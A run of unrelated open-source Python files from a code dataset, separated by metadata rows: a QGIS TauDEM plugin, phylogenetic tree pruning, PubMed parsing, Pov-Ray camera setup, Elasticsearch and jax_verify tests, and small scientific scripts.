'Configuration': ['Management'],
'Services': ['Requests', 'Workloads'],
}
}
role_access_ssui = {
'evmgroup-user_limited_self_service': {
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Virtual Machines']},
'Services': ['Requests', 'Catalogs', 'My Services']
},
'evmgroup-user_self_service': {
'Automation': {
'Ansible': ['Credentials', 'Repositories', 'Playbooks'],
'Ansible Tower': ['Explorer']},
'Compute': {
'Clouds': ['Instances'],
'Infrastructure': ['Virtual Machines'],
'Physical Infrastructure': ['Providers']},
'Configuration': ['Management'],
'Services': ['Requests', 'Catalogs', 'My Services']
},
}
| gpl-2.0 | -5,444,973,989,046,818,000 | 38.60312 | 100 | 0.529036 | false | 4.190537 | true | false | false |
camptocamp/QGIS | python/plugins/processing/taudem/dinftranslimaccum.py | 1 | 4866 | # -*- coding: utf-8 -*-
"""
***************************************************************************
dinftranslimaccum.py
---------------------
Date : October 2012
Copyright : (C) 2012 by Alexander Bruy
Email : alexander dot bruy at gmail dot com
***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************
"""
__author__ = 'Alexander Bruy'
__date__ = 'October 2012'
__copyright__ = '(C) 2012, Alexander Bruy'
# This will get replaced with a git SHA1 when you do a git archive
__revision__ = '$Format:%H$'
import os
from PyQt4.QtGui import *
from processing.core.GeoAlgorithm import GeoAlgorithm
from processing.core.ProcessingLog import ProcessingLog
from processing.tools.system import *
from processing.core.ProcessingConfig import ProcessingConfig
from processing.core.GeoAlgorithmExecutionException import GeoAlgorithmExecutionException
from processing.parameters.ParameterRaster import ParameterRaster
from processing.parameters.ParameterVector import ParameterVector
from processing.parameters.ParameterBoolean import ParameterBoolean
from processing.outputs.OutputRaster import OutputRaster
from processing.taudem.TauDEMUtils import TauDEMUtils
class DinfTransLimAccum(GeoAlgorithm):
DINF_FLOW_DIR_GRID = "DINF_FLOW_DIR_GRID"
SUPPLY_GRID = "SUPPLY_GRID"
CAPACITY_GRID = "CAPACITY_GRID"
IN_CONCENTR_GRID = "IN_CONCENTR_GRID"
OUTLETS_SHAPE = "OUTLETS_SHAPE"
EDGE_CONTAM = "EDGE_CONTAM"
TRANSP_LIM_ACCUM_GRID = "TRANSP_LIM_ACCUM_GRID"
DEPOSITION_GRID = "DEPOSITION_GRID"
OUT_CONCENTR_GRID = "OUT_CONCENTR_GRID"
def getIcon(self):
return QIcon(os.path.dirname(__file__) + "/../images/taudem.png")
def defineCharacteristics(self):
self.name = "D-Infinity Transport Limited Accumulation"
self.cmdName = "dinftranslimaccum"
self.group = "Specialized Grid Analysis tools"
self.addParameter(ParameterRaster(self.DINF_FLOW_DIR_GRID, "D-Infinity Flow Direction Grid", False))
self.addParameter(ParameterRaster(self.SUPPLY_GRID, "Supply Grid", False))
self.addParameter(ParameterRaster(self.CAPACITY_GRID, "Transport Capacity Grid", False))
self.addParameter(ParameterVector(self.OUTLETS_SHAPE, "Outlets Shapefile", [ParameterVector.VECTOR_TYPE_POINT], True))
self.addParameter(ParameterBoolean(self.EDGE_CONTAM, "Check for edge contamination", True))
self.addOutput(OutputRaster(self.TRANSP_LIM_ACCUM_GRID, "Transport Limited Accumulation Grid"))
self.addOutput(OutputRaster(self.DEPOSITION_GRID, "Deposition Grid"))
def processAlgorithm(self, progress):
commands = []
commands.append(os.path.join(TauDEMUtils.mpiexecPath(), "mpiexec"))
processNum = ProcessingConfig.getSetting(TauDEMUtils.MPI_PROCESSES)
if processNum <= 0:
raise GeoAlgorithmExecutionException("Wrong number of MPI processes used.\nPlease set correct number before running TauDEM algorithms.")
commands.append("-n")
commands.append(str(processNum))
commands.append(os.path.join(TauDEMUtils.taudemPath(), self.cmdName))
commands.append("-ang")
commands.append(self.getParameterValue(self.DINF_FLOW_DIR_GRID))
commands.append("-tsup")
commands.append(self.getParameterValue(self.SUPPLY_GRID))
commands.append("-tc")
commands.append(self.getParameterValue(self.CAPACITY_GRID))
param = self.getParameterValue(self.OUTLETS_SHAPE)
if param is not None:
commands.append("-o")
commands.append(param)
if str(self.getParameterValue(self.EDGE_CONTAM)).lower() == "false":
commands.append("-nc")
commands.append("-tla")
commands.append(self.getOutputValue(self.TRANSP_LIM_ACCUM_GRID))
commands.append("-tdep")
commands.append(self.getOutputValue(self.DEPOSITION_GRID))
loglines = []
loglines.append("TauDEM execution command")
for line in commands:
loglines.append(line)
ProcessingLog.addToLog(ProcessingLog.LOG_INFO, loglines)
TauDEMUtils.executeTauDEM(commands, progress)
#def helpFile(self):
# return os.path.join(os.path.dirname(__file__), "help", self.cmdName + ".html")
| gpl-2.0 | -4,222,742,194,063,032,300 | 42.446429 | 146 | 0.639129 | false | 3.96577 | false | false | false |
wrightaprilm/squamates | prunetree.py | 1 | 4177 | #! /usr/bin/env python
import dendropy
from dendropy.utility.fileutils import find_files
## operations for the ml tree
ml = dendropy.Tree.get_from_path("filename", "format")
print(ml.description())
node_D = ml.find_node_with_taxon_label("Sphenodon punctatus")
outgroup_node = spe_node.parent_node
ml = ml.reroot_at_node(outgroup_node, update_splits=True)
ml_rooted.write_to_path("filenamererooted", "newick")
## clone rerooted tree for pruning
ml0 = dendropy.Tree(ml)
ml1 = dendropy.Tree(ml)
ml2 = dendropy.Tree(ml)
ml3 = dendropy.Tree(ml)
ml4 = dendropy.Tree(ml)
ml5 = dendropy.Tree(ml)
## get mrca nodes for clades
ang_mrca = ml.mrca(taxon_labels=["Varanus indicus", "Anniella pulchra"])
gek_mrca = ml.mrca(taxon_labels=["Phelsuma ornata", "Delma impar"])
igu_mrca = ml.mrca(taxon_labels=["Iguana iguana", "Chamaeleo zeylanicus"])
lac_mrca = ml.mrca(taxon_labels=["Bipes biporus", "Teius teyou"])
ser_mrca = ml.mrca(taxon_labels=["Nerodia rhombifer", "Liotyphlops albirostris"])
sci_mrca = ml.mrca(taxon_labels=["Plestiodon fasciatus", "Acontias percivali"])
## pruning and writing trees goes here
ang_ml=dendropy.Tree()
ang_ml.seed_node = ang_mrca
ang_ml.write_to_path("ang_ml.tre","newick")
gek_ml=dendropy.Tree()
gek_ml.seed_node = gek_mrca
gek_ml.write_to_path("gek_ml.tre","newick")
igu_ml=dendropy.Tree()
igu_ml.seed_node = igu_mrca
igu_ml.write_to_path("igu_ml.tre","newick")
lac_ml=dendropy.Tree()
lac_ml.seed_node = lac_mrca
lac_ml.write_to_path("lac_ml.tre","newick")
ser_ml=dendropy.Tree()
ser_ml.seed_node = ser_mrca
ser_ml.write_to_path("ser_ml.tre","newick")
sci_ml=dendropy.Tree()
sci_ml.seed_node = sci_mrca
sci_ml.write_to_path("sci_ml.tre","newick")
## uncomment if trees are in separate files, import list of trees of type newick
##flist = find_files(top='trees', filename_filter='*.dated.tre')
##sqtrees = [dendropy.Tree.get_from_path(filename,"newick") for filename in flist]
##print(sqtrees.description(2))
## empty tree lists for pruned trees
angtrees = dendropy.TreeList()
gektrees = dendropy.TreeList()
igutrees = dendropy.TreeList()
lactrees = dendropy.TreeList()
sertrees = dendropy.TreeList()
scitrees = dendropy.TreeList()
## same operations as above but for a sample of trees
for tree in sqtrees:
node_D = tree.find_node_with_taxon_label("Sphenodon punctatus")
outgroup_node = spe_node.parent_node
ml.reroot_at_node(outgroup_node)
tree.write_to_path("treelistrerooted.tre","newick")
## clone tree list for pruning, will take a while
sq0 = dendropy.TreeList(sqtrees)
sq1 = dendropy.TreeList(sqtrees)
sq2 = dendropy.TreeList(sqtrees)
sq3 = dendropy.TreeList(sqtrees)
sq4 = dendropy.TreeList(sqtrees)
sq5 = dendropy.TreeList(sqtrees)
## pruning from lists of trees
for tree in sqtrees:
rep_ang_mrca = tree.mrca(taxon_labels=["Varanus indicus", "Anniella pulchra"])
ang_tree=dendropy.Tree()
ang_tree.seed_node = rep_ang_mrca
angtrees.append(ang_tree)
for tree in sqtrees:
rep_gek_mrca = tree.mrca(taxon_labels=["Phelsuma ornata", "Delma impar"])
gek_tree=dendropy.Tree()
gek_tree.seed_node = rep_gek_mrca
gektrees.append(gek_tree)
for tree in sqtrees:
rep_igu_mrca = tree.mrca(taxon_labels=["Iguana iguana", "Chamaeleo zeylanicus"])
igu_tree=dendropy.Tree()
igu_tree.seed_node = rep_igu_mrca
igutrees.append(igu_tree)
for tree in sqtrees:
rep_lac_mrca = tree.mrca(taxon_labels=["Bipes biporus", "Teius teyou"])
lac_tree=dendropy.Tree()
lac_tree.seed_node = rep_lac_mrca
lactrees.append(lac_tree)
for tree in sqtrees:
rep_ser_mrca = tree.mrca(taxon_labels=["Nerodia rhombifer", "Liotyphlops albirostris"])
ser_tree=dendropy.Tree()
ser_tree.seed_node = rep_ser_mrca
sertrees.append(ser_tree)
for tree in sqtrees:
rep_sci_mrca = tree.mrca(taxon_labels=["Plestiodon fasciatus", "Acontias percivali"])
sci_tree=dendropy.Tree()
sci_tree.seed_node = rep_sci_mrca
scitrees.append(sci_tree)
## write tree lists
angtrees.write_to_path("angtrees.tre", "newick")
gektrees.write_to_path("gektrees.tre", "newick")
igutrees.write_to_path("igutrees.tre", "newick")
lactrees.write_to_path("lactrees.tre", "newick")
sertrees.write_to_path("sertrees.tre", "newick")
scitrees.write_to_path("scitrees.tre", "newick")
| mit | -9,109,998,698,335,899,000 | 31.889764 | 88 | 0.734977 | false | 2.414451 | false | false | false |
jasonost/clinicaltrials | pubmed/Process_pub_data.py | 1 | 7282 | from bs4 import BeautifulSoup
import cPickle as pickle
import time
import os
def get_articles_data(data, investigator_mesh_dict):
time_count = 0
last_time = time.time()
auth_articles = {}
auth_articles_abs = {}
for key, value in data.items():
#test to see if value is null, if it is skip it
if value is None:
continue
time_count += 1
if (time_count%100) == 0:
print 'Count: ', time_count
print 'Duration (mins): ', (time.time() - last_time)/60
last_time = time.time()
#if the investigator has no mesh terms in the db skip them
if len(investigator_mesh_dict[key]['mesh']) == 0:
continue
auth_articles[key] = {}
auth_articles_abs[key] = {}
soup = BeautifulSoup(value)
for article in soup.findAll('pubmedarticle'):
#FILTER
#get published dates
#most pubdates refer to date as year but some refer to it as medlinedate
try:
year = article.findChild('pubdate').findChild('year').text
except:
#this includes months so we just pull out the year
year = article.findChild('pubdate').findChild('medlinedate').text[:4]
#if the year of the article is before 1995 skip it
if int(year) < 1995:
continue
mesh_list = article.findChild('meshheadinglist')
#if there are no mesh terms skip article
if mesh_list is None:
continue
#creates a list of mesh terms. each mesh term is a tuple with
#a major minor marker
mesh_terms = article.findAll('meshheading')
mesh_terms_list = []
for term in mesh_terms:
for element in term:
try:
if element.name == 'descriptorname':
mesh_terms_list.append((element.text, element.attrs.values()[0]))
except:
pass
#check to see if there are any matching mesh terms between the
#article and the investigator mesh terms from the db
skip_switch = True
for term, weight in mesh_terms_list:
#do not use certain very common mesh terms for matching
if term.lower() in ['adult', 'humans', 'male', 'female', 'aged']:
continue
if term.lower() in investigator_mesh_dict[key]['mesh']:
skip_switch = False
break
if skip_switch:
continue
#GET DATA
title = article.findChild('articletitle').text
pub_id = article.findChild('pmid').text
#get a list of all other ids
other_ids = article.findAll('articleid')
other_ids_list = []
for ids in other_ids:
other_ids_list.append((ids.attrs.values()[0],ids.text))
abstract = str(article.findChild('abstract'))
#creates a list of lists where each list consists of
#tuples of data types and the data
authors = article.findAll('author')
authors_list = []
for author in authors:
temp = []
for element in author:
try:
if element.name is not None:
if element.name == 'initials' or element.name == 'suffix':
continue
if element.name == 'forename':
temp[0] = element.text + ' ' + temp[0]
continue
temp.append(element.text)
except:
pass
authors_list.append(temp)
del temp
country = article.findChild('country').text
language = article.findChild('language').text
#this is a list of the chemicals found in the paper
#may be useful for maching articles to trials
#creates a list of all the chemicals in the paper if there are any
chemicals = article.findAll('chemical')
chemicals_list = []
for chemical in chemicals:
for element in chemical:
try:
if element.name == 'nameofsubstance':
chemicals_list.append(element.text)
except:
pass
#creates a list of keywords. each keyword is a tuple with
#a major minor marker
keywords = article.findAll('keyword')
keywords_list = []
for keyword in keywords:
keywords_list.append((keyword.text, keyword.attrs.values()[0]))
#not all journals have an issn, get text if it exists, pass if it doesn't
journal_id_issn = article.findChild('issn')
try:
journal_id_issn = journal_id_issn.text
except:
pass
#create dictionary
auth_articles[key][pub_id] = {'journal_id':journal_id_issn,
'keywords':keywords_list,
'mesh':mesh_terms_list,
'chemicals':chemicals_list,
'language':language,
'country':country,
'authors':authors_list,
'other_ids':other_ids_list,
'title':title,
'year':year
}
auth_articles_abs[key][pub_id] = abstract
return auth_articles, auth_articles_abs
#load in data files to run
data_list = []
data_files = os.listdir('.')
for f in data_files:
if 'investigator_dict_' in f:
data_list.append(f)
#list to keep track of which files have been run
run_files_list = []
#load pervious run files list
try:
run_files_list = pickle.load(open('processing_run_file_list.pkl', 'wb'))
except:
pass
#load in investigator mesh term dict
investigator_mesh_dict = pickle.load(open('investigator_mesh_dict.pkl', 'rb'))
#lowercase all mesh terms
for invest in investigator_mesh_dict:
investigator_mesh_dict[invest]['mesh'] = [x.lower() for x in investigator_mesh_dict[invest]['mesh']]
for f in data_list:
print f
if f not in run_files_list:
#load data to process
data = pickle.load(open( f, 'rb'))
#process data
auth_articles, auth_articles_abs = get_articles_data(data, investigator_mesh_dict)
if len(auth_articles) > 0:
pickle.dump(auth_articles, open('investigator_process/processed_' + f,'wb'))
pickle.dump(auth_articles_abs, open('investigator_process/abstracts_' + f,'wb'))
pickle.dump(run_files_list, open('processing_run_file_list.pkl', 'wb'))
del auth_articles
del auth_articles_abs
del data
run_files_list.append(f)
| mit | 7,680,286,593,999,288,000 | 34.521951 | 104 | 0.516754 | false | 4.497838 | false | false | false |
tschijnmo/ccpoviz | ccpoviz/defcamera.py | 1 | 3619 | """
Defining the camera for Pov-Ray visualization
=============================================
In order to hide the obsecure pov-ray camera definition from users, here
functions are provided to translate more user-friendly inputs into the pov-ray
options for the camera.
In order to specify a camera, the parameters needed are
focus
The focus of the camera, where to look at. Given relative to the centre of
the molecule.
distance
The distance from the camera to the focus.
theta, phi
The inclination and azimuth angles for the camera, basically the camera to
going to be placed at the position with spherical coordinate (distance,
theta, phi) with the focus as the origin.
rotation
The rotation of the camera within the plane of picturing.
aspect_ratio
The aspect-ratio, default to 4:3.
"""
import math
import numpy as np
from .util import format_vector, terminate_program
def compute_pos_ops(focus, distance, theta, phi, rotation, aspect_ratio):
"""Computes the camera options related to position and orientation
The arguments are documented in the module definition. The result will be a
list of dictionaries with the option name under the tag ``op-name`` and the
option value under the tag ``op-value``. This can be direct used for
rendering the pov-ray input mustache template.
The location and focus of the camera is also returned for later usage when
defining the light source.
All the angles should be in radian.
"""
# pylint: disable=too-many-arguments
camera_pos = np.array([
math.sin(theta) * math.cos(phi), math.sin(theta) * math.sin(phi),
math.cos(theta)
]) * distance + focus
sky_vec = np.array([
math.sin(rotation), math.cos(rotation), 0.0
])
up_vec = np.array([0.0, 1.0, 0.0])
right_vec = np.array([-aspect_ratio, 0.0, 0.0])
ret_val = [
('location', format_vector(camera_pos)),
('up', format_vector(up_vec)),
('right', format_vector(right_vec)),
('sky', format_vector(sky_vec)),
('look_at', format_vector(focus))
]
return ([
{'op-name': i[0], 'op-value': i[1]}
for i in ret_val
], camera_pos, focus)
def gen_camera_ops(ops_dict, structure):
"""Generate the list for the camera options
This is a shallow wrapper of the above :py:func:`compute_pos_ops` where the
reading and verification of the user input is also performed.
:param ops_dict: The dictionary of options for the run
:param structure: The structure to plot
:returns: A list of dictionaries for rendering the camera in the pov-ray
mustache template. The resulted list can be assigned to a key in the
rendering dictionary. And the location and the focus of the camera is
also returned.
"""
# First we need to find the focus out
focus_inp = ops_dict['camera-focus']
focus = np.mean([
i.coord for i in structure.atms
], axis=0)
if len(focus_inp) == 3:
focus += np.array(focus_inp)
else:
terminate_program(
'Invalid camera-focus option: %r' % focus_inp
)
# Other parameters
distance = ops_dict['camera-distance']
to_radian = 2 * math.pi / 360.0
theta = ops_dict['camera-theta']
theta *= to_radian
phi = ops_dict['camera-phi']
phi *= to_radian
rotation = ops_dict['camera-rotation']
rotation *= to_radian
aspect_ratio = ops_dict['aspect-ratio']
return compute_pos_ops(
focus, distance, theta, phi, rotation, aspect_ratio
)
| mit | -1,858,015,693,737,558,800 | 27.722222 | 79 | 0.648798 | false | 3.866453 | false | false | false |
ytyng/django-elasticindex | tests/tests.py | 1 | 5365 | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import time
from django.test import TestCase
from .models import DummyModel, DummyESDocument, DummyESDocumentPresetIndex
class TestESDocumentTest(TestCase):
def setUp(self):
if DummyESDocument.index.exists():
DummyESDocument.index.delete()
DummyESDocument.index.create()
# install fixtures.
# Bulk update from model instances.
DummyModel.objects.create(key='quick', value='brown fox')
DummyModel.objects.create(key='jumps', value='over the')
DummyESDocument.rebuild_index()
# Update from single instance.
d3 = DummyModel.objects.create(key='lazy', value='dogs.')
DummyESDocument.rebuild_index_by_source_model(d3)
# Update from dict
DummyESDocument.update('id-manually', {'key': 'spam', 'value': 'eggs'})
# Wait commit
for i in range(10):
try:
result = DummyESDocument.objects.get(
{"term": {"value": "eggs"}})
break
except DummyESDocument.DoesNotExist:
time.sleep(0.3)
continue
self.assertEqual(result.key, 'spam')
def test_index_search(self):
# Simple query
results = DummyESDocument.objects.query({"match": {"key": "jumps"}})
result = list(results)[0]
self.assertEqual(result.value, 'over the')
# OR query
qs = DummyESDocument.objects.query(
{"bool": {
"should": [
{"match": {"value": "dogs"}},
{"match": {"value": "fox"}},
]}})
qs = qs.order_by({"key": "desc"})
result = qs[1]
self.assertEqual(result.value, "dogs.")
def tearDown(self):
# teardown ES index
DummyESDocument.index.delete()
class TestESDocumentPresetIndexTest(TestCase):
def setUp(self):
if DummyESDocumentPresetIndex.index.exists():
DummyESDocumentPresetIndex.index.delete()
DummyESDocumentPresetIndex.index.create()
DummyESDocumentPresetIndex.update(
'doc1', {
'key': 'doc1',
'text_k': "セキュリティのため、ローカルホストやローカルネットワークに"
"しかアクセスを許可していない Web アプリってあると思います。",
'text_b': "例えば、オフィスで起動している社内サーバ。Jenkinsとか。"
"Wikiとか。サーバ監視ツールとか。例えば、本番環境で起動"
"している Docker コンテナの中で動いているWebツールとか。",
})
DummyESDocumentPresetIndex.update(
'doc2', {
'key': 'doc2',
'text_k': "私の場合は、elasticsearch の head プラグインのWeb"
"管理画面を起動しているのですが、ローカルホストからしか"
"アクセスを許可してませんので、外からアクセスするには"
"一工夫必要です。",
'text_b': "クライアントは Firefox に入ってますし、サーバは OpenSSH "
"に組み込まれていますので、別途ソフトウェアのインストールは"
"不要です。",
})
# Simple Query (and wait commit) (OMG)
for i in range(10):
try:
result = DummyESDocumentPresetIndex.objects.get(
{"term": {"key": "doc2"}})
break
except DummyESDocumentPresetIndex.DoesNotExist:
time.sleep(0.3)
continue
self.assertIn('不要です。', result.text_b)
def test_index_kuromoji_1(self):
results = DummyESDocumentPresetIndex.objects.query(
{"match": {"text_k": "起動"}})
r = list(results)
self.assertEqual(len(r), 1)
self.assertEqual(r[0].key, 'doc2')
def test_index_kuromoji_2(self):
results = DummyESDocumentPresetIndex.objects.query(
{"match": {"text_k": "ネットワーク"}})
r = list(results)
self.assertEqual(len(r), 1)
self.assertEqual(r[0].key, 'doc1')
def test_index_bigram_1(self):
results = DummyESDocumentPresetIndex.objects.query(
{"match": {"text_b": "ソフトウ"}})
r = list(results)
self.assertEqual(len(r), 1)
self.assertEqual(r[0].key, 'doc2')
def test_index_bigram_2(self):
results = DummyESDocumentPresetIndex.objects.query(
{"match": {"text_b": "視ツ"}})
r = list(results)
self.assertEqual(len(r), 1)
self.assertEqual(r[0].key, 'doc1')
def test_index_bigram_3(self):
results = DummyESDocumentPresetIndex.objects.query(
{"match": {"text_b": "Firefoxサーバ"}})
list(results)
# r = list(results)
# len(r) がここで0にならないといけない。が、なってない
# 要 Elasticsearchの理解
# self.assertEqual(len(r), 0)
def tearDown(self):
DummyESDocumentPresetIndex.index.delete()
| bsd-3-clause | -8,059,776,069,640,500,000 | 33.5 | 79 | 0.546944 | false | 3.048015 | true | false | false |
spatchcock/models | gaussian_with_advection_and_decay.py | 1 | 1810 | # -*- coding: utf-8 -*-
"""
Created on Sun Jan 31 10:45:25 2016
@author: spatchcock
"""
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.mplot3d import Axes3D
import matplotlib.animation as animation
import matplotlib.colors as colors
#%%
def two_d_gauss(x, y, M, meanx, meany, stdevx, stdevy):
g = np.zeros((np.size(x), np.size(y)))
for i in np.arange(0, np.size(x), 1):
for j in np.arange(0, np.size(y), 1):
g[i][j] = (M/(2*np.pi*stdevx*stdevy)) * np.exp(-((((x[i] - meanx)**2.0)/(2.0*(stdevx**2.0))) + (((y[j] - meany)**2.0)/(2.0*(stdevy**2.0)))))
return g
### Invoke model timestep and replot data on each iteration
#def animate(i):
# data = two_d_gauss(x, y, M, meanx[i], meany[i], stdevx[i], stdevy[i])
#
# im.set_array(np.ravel(data)
# step_text.set_text('iter: %.1f' % i)
# plt.draw()
#%%
t = np.arange(1,1000,1)
domain_range = 100
x = np.arange(-domain_range/2,domain_range/2,1)
y = np.arange(-domain_range/2,domain_range/2,1)
u = 0.3*np.sin(2*np.pi*t/50)
v = 0.0
D_x = 0.5
D_y = 0.1
startx = 0.0
starty = 0.0
M = 1000
meanx = startx + u*t
stdevx = np.sqrt(2.0*D_x*t)
meany = starty + v*t
stdevy = np.sqrt(2.0*D_y*t)
#%%
X, Y = np.meshgrid(x, y)
Z = two_d_gauss(x, y, M, startx, starty, stdevx[0], stdevy[0])
Z_max = np.max(Z)
norm=colors.Normalize(vmin=0.,vmax=Z_max/10.0)
fig = plt.figure()
ims = []
ims.append((plt.pcolor(X,Y,Z, cmap='Reds', norm=norm),))
for ts in np.arange(2,100,1):
Z = two_d_gauss(x, y, M, meanx[ts], meany[ts], stdevx[ts], stdevy[ts])
ims.append((plt.pcolor(X,Y,Z, cmap='Reds', norm=norm),))
#%%
### Plot ###
im_ani = animation.ArtistAnimation(fig, ims, interval=50, repeat_delay=500, blit=True)
#im_ani.save('im.mp4', metadata={'artist':'Guido'})
plt.show()
| unlicense | -1,696,145,834,400,665,300 | 20.807229 | 152 | 0.600552 | false | 2.218137 | false | false | false |
deepmind/jax_verify | jax_verify/tests/ibp_test.py | 1 | 4160 | # coding=utf-8
# Copyright 2020 The jax_verify Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for Interval Bound Propagation."""
import functools
from absl.testing import absltest
from absl.testing import parameterized
import haiku as hk
import jax
import jax.numpy as jnp
import jax_verify
class IBPTest(parameterized.TestCase):
def assertArrayAlmostEqual(self, lhs, rhs):
diff = jnp.abs(lhs - rhs).max()
self.assertAlmostEqual(diff, 0.)
def test_linear_ibp(self):
def linear_model(inp):
return hk.Linear(1)(inp)
z = jnp.array([[1., 2., 3.]])
params = {'linear':
{'w': jnp.ones((3, 1), dtype=jnp.float32),
'b': jnp.array([2.])}}
fun = functools.partial(
hk.without_apply_rng(hk.transform(linear_model, apply_rng=True)).apply,
params)
input_bounds = jax_verify.IntervalBound(z - 1., z + 1.)
output_bounds = jax_verify.interval_bound_propagation(fun, input_bounds)
self.assertAlmostEqual(5., output_bounds.lower)
self.assertAlmostEqual(11., output_bounds.upper)
def test_conv1d_ibp(self):
def conv1d_model(inp):
return hk.Conv1D(output_channels=1, kernel_shape=2,
padding='VALID', stride=1, with_bias=True)(inp)
z = jnp.array([3., 4.])
z = jnp.reshape(z, [1, 2, 1])
params = {'conv1_d':
{'w': jnp.ones((2, 1, 1), dtype=jnp.float32),
'b': jnp.array([2.])}}
fun = functools.partial(
hk.without_apply_rng(hk.transform(conv1d_model, apply_rng=True)).apply,
params)
input_bounds = jax_verify.IntervalBound(z - 1., z + 1.)
output_bounds = jax_verify.interval_bound_propagation(fun, input_bounds)
self.assertAlmostEqual(7., output_bounds.lower)
self.assertAlmostEqual(11., output_bounds.upper)
def test_conv2d_ibp(self):
def conv2d_model(inp):
return hk.Conv2D(output_channels=1, kernel_shape=(2, 2),
padding='VALID', stride=1, with_bias=True)(inp)
z = jnp.array([1., 2., 3., 4.])
z = jnp.reshape(z, [1, 2, 2, 1])
params = {'conv2_d':
{'w': jnp.ones((2, 2, 1, 1), dtype=jnp.float32),
'b': jnp.array([2.])}}
fun = functools.partial(
hk.without_apply_rng(hk.transform(conv2d_model, apply_rng=True)).apply,
params)
input_bounds = jax_verify.IntervalBound(z - 1., z + 1.)
output_bounds = jax_verify.interval_bound_propagation(fun, input_bounds)
self.assertAlmostEqual(8., output_bounds.lower)
self.assertAlmostEqual(16., output_bounds.upper)
def test_relu_ibp(self):
def relu_model(inp):
return jax.nn.relu(inp)
z = jnp.array([[-2., 3.]])
input_bounds = jax_verify.IntervalBound(z - 1., z + 1.)
output_bounds = jax_verify.interval_bound_propagation(relu_model,
input_bounds)
self.assertArrayAlmostEqual(jnp.array([[0., 2.]]), output_bounds.lower)
self.assertArrayAlmostEqual(jnp.array([[0., 4.]]), output_bounds.upper)
def test_softplus_ibp(self):
def softplus_model(inp):
return jax.nn.softplus(inp)
z = jnp.array([[-2., 3.]])
input_bounds = jax_verify.IntervalBound(z - 1., z + 1.)
output_bounds = jax_verify.interval_bound_propagation(softplus_model,
input_bounds)
self.assertArrayAlmostEqual(jnp.logaddexp(z - 1., 0),
output_bounds.lower)
self.assertArrayAlmostEqual(jnp.logaddexp(z + 1., 0),
output_bounds.upper)
if __name__ == '__main__':
absltest.main()
| apache-2.0 | -1,775,091,613,955,423,200 | 32.821138 | 79 | 0.621635 | false | 3.360258 | true | false | false |
pradeepchhetri/pyvultr | setup.py | 1 | 1297 | #!/usr/bin/env python
from pyvultr.meta import (__version__, __description__, __author__,
__author_email__, __url__)
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
packages = [
'pyvultr',
'pyvultr.cmd',
'pyvultr.lib'
]
requires = open("requirements/base.txt").read().split()
setup(
name='pyvultr',
version=__version__,
description=__description__,
author=__author__,
author_email=__author_email__,
url=__url__,
packages=packages,
package_data={'': ['LICENSE']},
package_dir={'pyvultr': 'pyvultr'},
include_package_data=True,
install_requires=requires,
license=open('LICENSE').read(),
zip_safe=False,
classifiers=(
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Natural Language :: English',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: Implementation :: PyPy',
),
)
| unlicense | -4,166,431,794,577,748,500 | 27.822222 | 67 | 0.58751 | false | 4.02795 | false | true | false |
tiagoantao/AgeStructureNe | sampleLoci.py | 1 | 1346 | from __future__ import print_function
from sys import stdin, argv, exit
import bz2
import random
if len(argv) not in [4, 5]:
print("python %s genFile loci maxLoci [startLoci]" % (argv[0],))
exit(-1)
genFile = argv[1]
nloci = int(argv[2])
maxLoci = int(argv[3])
startLoci = int(argv[4]) if len(argv) == 5 else 0
loci = [x + startLoci for x in random.sample(list(range(maxLoci)), nloci)]
l = stdin.readline()
gens = []
currGen = 0
# get individuals per generation
indivs = set()
while l != "":
l = l.rstrip()
point = l.find(" ")
gen = l[:point]
genIndivs = eval(l[point:])
indivs = indivs.union(genIndivs)
gens.append(genIndivs)
l = stdin.readline()
# get genetic data
f = bz2.open(genFile, 'rt')
l = f.readline()
genetics = {}
while l != "":
toks = l.rstrip().split(" ")
id = int(float(toks[0]))
gen = int(float(toks[1]))
myAlleles = toks[2:]
if id in indivs:
myloci = []
for locus in loci:
myloci.append(myAlleles[locus])
genetics[id] = myloci
l = f.readline()
f.close()
# print >>stderr, genetics.keys()
# dump genepop file
print("lala land")
for locus in loci:
print("l" + str(locus))
for indivs in gens:
print("Pop")
for indiv in indivs:
print("i" + str(indiv) + ",", end=' ')
print(" ".join(genetics[indiv]))
| agpl-3.0 | -2,048,678,567,316,271,600 | 21.433333 | 74 | 0.59584 | false | 2.758197 | false | false | false |
inercia/evy | evy/patched/os.py | 1 | 3820 | #
# Evy - a concurrent networking library for Python
#
# Unless otherwise noted, the files in Evy are under the following MIT license:
#
# Copyright (c) 2012, Alvaro Saurin
# Copyright (c) 2008-2010, Eventlet Contributors (see AUTHORS)
# Copyright (c) 2007-2010, Linden Research, Inc.
# Copyright (c) 2005-2006, Bob Ippolito
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
